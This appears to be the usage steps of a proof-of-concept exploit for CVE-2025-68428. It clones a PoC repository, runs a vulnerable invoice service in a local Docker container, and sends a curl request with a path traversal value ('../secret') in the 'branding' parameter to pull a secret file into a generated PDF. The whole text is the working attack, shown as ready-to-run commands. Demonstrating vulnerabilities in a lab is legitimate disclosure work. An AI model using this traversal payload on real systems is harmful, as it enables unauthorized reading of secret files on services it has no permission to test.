$ git clone https://github.com/12nio/CVE-2025-68428_PoC/ && cd CVE-2025-68428_PoC
$ sudo docker build -t poc .
$ sudo docker run --rm -p 8080:8080 --name vuln poc
$ curl "http://127.0.0.1:8080/api/v1/generate-invoice?client=Dinko&branding=../secret" --output poc.pdf